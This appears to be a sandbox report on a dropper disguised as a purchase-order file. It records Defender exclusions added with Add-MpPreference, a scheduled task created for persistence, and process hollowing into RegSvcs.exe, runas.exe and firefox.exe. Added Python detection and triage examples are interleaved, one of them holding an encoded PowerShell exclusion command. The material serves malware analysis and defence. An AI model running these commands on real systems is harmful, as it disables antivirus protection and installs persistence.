Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtTerminateThread: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | NtCreateUserProcess: Direct from: 0x76F0371C
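The "Direct from" rows above are the evidence behind the "Found direct / indirect Syscall" signature: the sandbox records the address from which each Nt* call entered the kernel. The check an EDR applies is simple to state: on the legitimate path the kernel transition happens inside an ntdll.dll stub that was called from code in a loaded module; a transition issued from a private allocation or from another image is a direct syscall, and an ntdll stub that was reached by a jump from unbacked memory is an indirect one. The following is an added example written for this page, not code from Joe Sandbox or from the sample. The module map, the call sites and the caller addresses are all constructed; the report's own "Direct from" lines are parsed only to show their format, and the page does not say which module those addresses belonged to, so no verdict is drawn about them here.

```python
"""Classify where a system call was issued from (direct / indirect syscall check).

Added example, not code from the sandbox or the sample. MODULES and
SAMPLE_CALLS are constructed; none of their addresses come from the report."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def module_for(addr: int, modules) -> Optional[Module]:
    """Map an address to the loaded module backing it, or None for private memory."""
    return next((m for m in modules if m.contains(addr)), None)


def classify_syscall(origin: int, caller: Optional[int], modules) -> str:
    """origin: address of the instruction that entered the kernel.
    caller: return address of the frame that invoked the stub (None if unknown).
    The expected path is an ntdll.dll stub reached from code in a loaded module;
    everything else is how direct and indirect syscalls show up."""
    o = module_for(origin, modules)
    if o is None:
        return "direct_syscall_from_unbacked_memory"      # syscall instruction in a private allocation
    if o.name.lower() != "ntdll.dll":
        return "direct_syscall_from_" + o.name.lower()    # stub compiled into another image
    if caller is None:
        return "ntdll_stub_caller_unknown"
    if module_for(caller, modules) is None:
        return "indirect_syscall_ntdll_stub_reached_from_unbacked_memory"  # jump into ntdll's stub
    return "expected"


# Constructed 32-bit layout for the examples; real bases differ per boot (ASLR).
MODULES = [
    Module("ntdll.dll", 0x76EE0000, 0x001A0000),
    Module("kernel32.dll", 0x75B00000, 0x000F0000),
    Module("nhClcdOjQwJ.exe", 0x00D10000, 0x00080000),
]

# Constructed call sites: (syscall, origin, caller).
SAMPLE_CALLS = [
    ("NtAllocateVirtualMemory", 0x76F1A0C8, 0x75B12345),  # ntdll stub called from kernel32
    ("NtWriteVirtualMemory", 0x02A1001C, 0x02A10040),     # syscall instruction inside a private RWX region
    ("NtProtectVirtualMemory", 0x76F1A1F8, 0x02A100A0),   # ntdll stub entered by a jump from shellcode
    ("NtCreateUserProcess", 0x00D2371C, 0x00D23700),      # syscall instruction inside the dropper's own image
]


def classify_all(calls=SAMPLE_CALLS, modules=MODULES):
    return [(name, classify_syscall(origin, caller, modules)) for name, origin, caller in calls]


# The report rows carry only the syscall name and the issuing address. This pulls
# both out so they can be fed to classify_syscall once a module map for that run
# is available (the page does not provide one).
LINE_RE = re.compile(r"(Nt\w+): Direct from: 0x([0-9A-Fa-f]+)")


def parse_report_lines(lines):
    return [(m.group(1), int(m.group(2), 16)) for m in map(LINE_RE.search, lines) if m]


if __name__ == "__main__":
    for name, verdict in classify_all():
        print(f"{name:28s} {verdict}")
```

Two caveats for anyone turning this into a real check: the caller address needs a stack walk at the time of the transition, and in a 32-bit process on 64-bit Windows (the sample runs from SysWOW64) the actual kernel transition goes through wow64cpu.dll rather than ntdll.dll, so a production version whitelists that module as well.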
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: read write
Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runas.exe | Thread register set: target process: 7920
Source: C:\Windows\SysWOW64\runas.exe | Thread APC queued: target process: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D83008
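Read together, the RegSvcs.exe rows describe process hollowing: the dropper allocates memory at base 400000 in a freshly started RegSvcs.exe with execute/read/write protection, then writes a buffer there that begins with 4D5A (the MZ signature), followed by further writes at 401000 and D83008. Base 400000 is the usual preferred ImageBase of a 32-bit .NET Framework utility, so the write replaces the host's own image with a payload that needs no relocation. The example below, added for this page and not code from the sandbox or the sample, shows how a triage script checks such a write: it parses the PE headers of the written buffer and compares the payload's preferred ImageBase with the address being overwritten and with the host's on-disk ImageBase. The MemWrite event and the injected buffer are constructed (the real payload bytes are not on the page), and RegSvcs.exe's on-disk ImageBase of 0x400000 is an assumption to be confirmed against the file.

```python
"""Triage a cross-process memory write as possible image replacement (hollowing).

Added example, not code from the sandbox or the sample. SAMPLE_WRITE and the
PE buffer are constructed; REGSVCS_DISK_IMAGE_BASE is an assumption."""
import struct
from dataclasses import dataclass

IMAGE_DOS_SIGNATURE = b"MZ"      # 4D 5A, what the report saw at the write address
IMAGE_NT_SIGNATURE = b"PE\0\0"
PE32, PE32_PLUS = 0x10B, 0x20B


def parse_pe_header(buf: bytes):
    """Return (image_base, size_of_image, entry_rva) for a buffer that starts with
    a PE image's headers, or None if the headers are not well formed."""
    if len(buf) < 0x40 or buf[:2] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        return None
    size_opt = struct.unpack_from("<H", buf, e_lfanew + 20)[0]  # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = e_lfanew + 24                                          # optional header follows the 20-byte COFF header
    if size_opt < 60 or opt + size_opt > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry_rva = struct.unpack_from("<I", buf, opt + 16)[0]
    if magic == PE32:
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == PE32_PLUS:
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]
    return image_base, size_of_image, entry_rva


@dataclass
class MemWrite:
    source: str      # process doing the writing
    target: str      # process being written to
    base: int        # address written
    protect: str     # protection of the target region, as the sandbox prints it
    data: bytes      # leading bytes of the written buffer


def assess_hollowing(ev: MemWrite, target_disk_image_base: int):
    """Return the reasons a write looks like image replacement; [] for a plain data write."""
    hdr = parse_pe_header(ev.data)
    if hdr is None:
        return []
    image_base, size_of_image, entry_rva = hdr
    reasons = ["pe_image_written_cross_process"]
    if ev.base == target_disk_image_base:
        reasons.append("overwrites_host_image_base")
    if image_base == ev.base:
        reasons.append("payload_prefers_that_base")   # no relocation needed, typical of hollowing payloads
    if "execute" in ev.protect and "write" in ev.protect:
        reasons.append("region_is_rwx")
    if entry_rva >= size_of_image:
        reasons.append("entry_point_outside_image")    # malformed header, still worth a look
    return reasons


def build_minimal_pe(image_base: int, plus: bool = False, size_of_image: int = 0x10000, entry_rva: int = 0x1000) -> bytes:
    """Constructed test input: a header-only PE32 or PE32+ image (no sections),
    enough for parse_pe_header; it is not a loadable executable."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_opt = 0xF0 if plus else 0xE0
    machine = 0x8664 if plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, size_opt, 0x0002)  # Characteristics: EXECUTABLE_IMAGE
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, PE32_PLUS if plus else PE32)
    struct.pack_into("<I", opt, 16, entry_rva)
    if plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, size_of_image)
    return bytes(dos) + IMAGE_NT_SIGNATURE + coff + bytes(opt)


REGSVCS_DISK_IMAGE_BASE = 0x400000   # assumed; read IMAGE_OPTIONAL_HEADER.ImageBase from the file in practice

# Constructed event modelled on the report's "Memory written ... value starts with: 4D5A" row.
SAMPLE_WRITE = MemWrite(
    source=r"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe",
    target=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
    base=0x400000,
    protect="page execute and read and write",
    data=build_minimal_pe(image_base=0x400000),
)

if __name__ == "__main__":
    print(assess_hollowing(SAMPLE_WRITE, REGSVCS_DISK_IMAGE_BASE))
```

The same parser applies to the later writes at 401000 and D83008 only in the sense of confirming they are not headers; those are section data and a remote-thread context or stub, and the decisive evidence is the first write landing a full PE at the host's ImageBase.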
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
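The process-creation rows above are the whole evasion and persistence chain in four command lines: PowerShell adding Defender exclusions for the dropper and its copy in AppData\Roaming, schtasks.exe importing a task named Updates\STiokuWkiGFJ from an XML file in the user's Temp directory, RegSvcs.exe started with no arguments as the hollowing host, and runas.exe started with no arguments as the next injection host before firefox.exe. Each of those is detectable from process-creation telemetry alone. The following is an added example for this page, not the sandbox's Sigma rules and not code from the sample: a small detector run over Sysmon-style events. The events are constructed to mirror the command lines in the report; the PIDs, the benign control event and the -EncodedCommand variant (the form behind the "Powershell Base64 Encoded MpPreference Cmdlet" signature) are made up, and the field names are a simplification of Sysmon's.

```python
"""Flag the process-creation chain from the report in Sysmon-style events.

Added example, not the sandbox's own rules or code from the sample. The
events below are constructed; PIDs and the benign/encoded variants are invented."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str


DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}  # common hollowing hosts
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _args(cmdline: str) -> str:
    """Drop the (possibly quoted) program token; return the argument string."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1) if m else ""


def _effective_powershell(cmdline: str) -> str:
    """Return the script PowerShell will actually run: -EncodedCommand carries base64
    of UTF-16LE text, which hides the cmdlet name from a plain grep. PowerShell also
    accepts other unambiguous prefixes of the switch; the common spellings are covered."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except ValueError:
        return cmdline


def detect(events):
    """Return (rule, pid) pairs, one per matching event."""
    hits = []
    for ev in events:
        exe = _basename(ev.image)
        args = _args(ev.cmdline).strip()
        parent_dir = ev.parent_image.lower()
        if exe in ("powershell.exe", "pwsh.exe"):
            script = _effective_powershell(ev.cmdline)
            if re.search(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", script, re.I | re.S):
                hits.append(("defender_exclusion_added", ev.pid))
        elif exe == "schtasks.exe":
            m = re.search(r'/create\b.*?/xml\s+(?:"([^"]+)"|(\S+))', args, re.I | re.S)
            xml = (m.group(1) or m.group(2)).lower() if m else ""
            if any(t in xml for t in TEMP_DIRS):
                hits.append(("scheduled_task_from_temp_xml", ev.pid))
        elif exe in DOTNET_HOSTS and not args and any(p in parent_dir for p in USER_WRITABLE):
            hits.append(("dotnet_host_spawned_without_args", ev.pid))
        elif exe == "runas.exe" and not args:
            hits.append(("runas_without_args", ev.pid))   # a real runas carries /user and a command
    return hits


# Constructed events modelled on the report's process tree (PIDs invented).
SAMPLE_EVENTS = [
    ProcEvent(1001, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"',
              r"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"),
    ProcEvent(1002, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"',
              r"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"),
    ProcEvent(1003, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
              r"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"),
    ProcEvent(1004, r"C:\Windows\SysWOW64\runas.exe", r'"C:\Windows\SysWOW64\runas.exe"',
              r"C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe"),
    # benign control: an administrator importing a task definition from a managed folder
    ProcEvent(1005, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\Ops\tasks\nightly.xml"',
              r"C:\Windows\System32\cmd.exe"),
    # the same exclusion hidden behind -EncodedCommand (constructed variant)
    ProcEvent(1006, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc " + base64.b64encode(
                  'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")).decode(),
              r"C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:36s} pid={pid}")
```

The exclusion rule is the one to prioritise on a live host: once Add-MpPreference has run, nothing Defender reports afterwards about those paths can be trusted, so the response step that goes with this detection is to list and remove the exclusions (Get-MpPreference exposes ExclusionPath) and to delete the Updates\STiokuWkiGFJ task.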
Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
